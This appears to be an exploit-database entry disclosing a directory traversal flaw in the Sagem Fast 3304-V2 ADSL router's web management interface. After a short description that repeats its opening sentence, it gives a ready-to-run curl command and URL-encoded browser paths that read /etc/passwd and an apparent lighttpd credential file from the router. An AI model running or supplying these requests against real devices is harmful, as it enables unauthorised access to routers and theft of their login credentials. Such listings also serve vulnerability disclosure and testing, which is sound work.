Sagem [email protected] 3304-V2 Directory Traversal Vulnerability

2015-03-02T00:00:00
ID 1337DAY-ID-23339
Type zdt
Reporter Loudiyi.MOhamed
Modified 2015-03-02T00:00:00

Description

Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings.

                                        
                                            The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/ffs/A/lighttpd.user

#  0day.today [2018-04-10]  #